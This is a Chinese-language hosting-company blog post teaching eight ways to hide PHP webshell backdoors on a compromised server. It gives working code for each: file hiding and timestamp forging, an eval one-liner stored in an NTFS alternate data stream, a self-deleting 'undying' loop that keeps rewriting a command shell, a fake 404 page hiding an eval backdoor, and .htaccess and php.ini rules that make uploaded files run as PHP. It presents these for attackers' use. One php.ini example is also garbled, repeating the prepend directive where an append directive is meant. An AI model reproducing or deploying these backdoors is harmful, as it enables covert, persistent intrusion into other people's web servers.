PHP怎么添加隐藏后门?教你八个方�
Admin 2021-04-27 群英技术资�
PHP怎么添加隐藏后门?很多PHP初学者可能对于PHP后门隐藏不是很清楚,因此,这篇文章就给大家分享一些PHP隐藏后门的方法,下面是具体的用法级示例,有需要的朋友一起的来学习一下吧�
如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等�
1、隐藏文�
使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性�
attrib +s +a +h +r shell.php //隐藏shell.php文件
2、修改文件时间属�
当你试图在一堆文件中隐藏自己新创建的文件,那么,除了创建一个迷惑性的文件名,还需要修改文件的修改日期�
//修改时间修改 Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12" //访问时间修改 Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12" //创建时间修改 Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
使用命令获取文件属�
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
修改某个文件夹下所有文件的创建和修改时�
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
3、利用ADS隐藏文件内容
在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞�
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的�
利用include函数,将index.php:hidden.jpg进行hex编码,把这个ADS文件include进去,这样子就可以正常解析我们的一句话了�
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4、不死马
不死马会删除自身,以进程的形式循环创建隐蔽的后门�
<?php set_time_limit(0); ignore_user_abort(1); unlink(__FILE__); //删除自身 while(1) { file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.php,这里最好用免杀的一句话 sleep(10); //间隔时间 } ?>
处理方式最简单有效的办法,就是重启服务就可以删除webshell文件�
5、中间件后门
将编译好的so文件复制到modules文件夹,启动后门模块,重启Apache。当发送特定参数的字符串过去时,即可触发后门�
6、利�404页面隐藏后门
404页面主要用来提升用户体验,可用来隐藏后门文件�
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>
7、利� .htaccess 文件构成PHP后门
一�.htaccess可以用来留后门和针对黑名单绕过,在上传目录创�.htaccess 文件写入,无需重启即可生效,上传png文件解析�
AddType application/x-httpd-php .png
另外,在.htaccess 加入php解析规则,把文件名包�1的解析成php,上�1.txt即可解析�
<FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch>
8、利� php.ini 隐藏后门文件
php.ini 中可以指定在主文件执行前后自动解析的文件名称,常用于页面公共头部和尾部,也可以用来隐藏php后门�
;在PHP文档之前自动添加文件�
auto_prepend_file = "c:\tmp.txt"
;在PHP文档之后自动添加文件�
auto_prepend_file = "c:\tmp.txt"
需重启服务生效,访问任意一个php文件即可获取webshell�
总结
以上就是关于php怎么添加隐藏后门的介绍,本文介绍了八个方法,希望对大家学习有帮助,更多PHP内容大家可以继续关注其他文章�
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:[email protected]进行举报,并提供相关证据,查实之后,将立刻删除涉嫌侵权内容�
猜你喜欢
PHP实现递归有哪些方法?很多人对PHP实现递归的方法不是很了解,对此,这篇文章就给大家介绍三种PHP实现递归的方法,分别是利用引用做参数、利用全局变量和利用静态变量,有这方面学习需要的朋友可以参考�
这篇文章给大家分享的是有关php图像处理的操作,主要介绍添加文字水印,图片水印和压缩图像,小编觉得是比较实用的,因此分享给大家参考,感谢的朋友们可以了解一下�
php5和php7的区别有哪些?本文会从多方面对比php5和php7,对大家了解php5和php7的区别有一定帮助,感兴趣的朋友就跟随小编一起看看吧�
有时候我们需要使用正则表达式的预查功能,因此就需要了解正向预查与反向预查,这篇问文章就主要给大家介绍正向预查与反向预查的作用以及用法,具有一定的参考价值,感兴趣的朋友就继续往下看吧�
PHP如何编写图形计算器?对四则运算计算器我们都很熟悉了,有些朋友就好奇能不能对图像计算呢?当然是可以的,下面就给大家介绍一下如何实现三角形,矩形和圆形计算的简易计算器
推荐内容
联系我们
24小时售后 � 24小时售后TEL�0668-2555666 售前咨询TEL�400-678-4567 投诉建议TEL�0668-2555999 投诉建议邮箱:t[email protected] 信息安全TEL�0668-2555118 域名空间客服 � 公司总机�0668-2555555 公司传真�0668-2555000Copyright © QY Network Company Ltd. All Rights Reserved. 2003-2020 群英 版权所� 茂名市群英网络有限公�
增值电信经营许可证 : B1.B2-20140078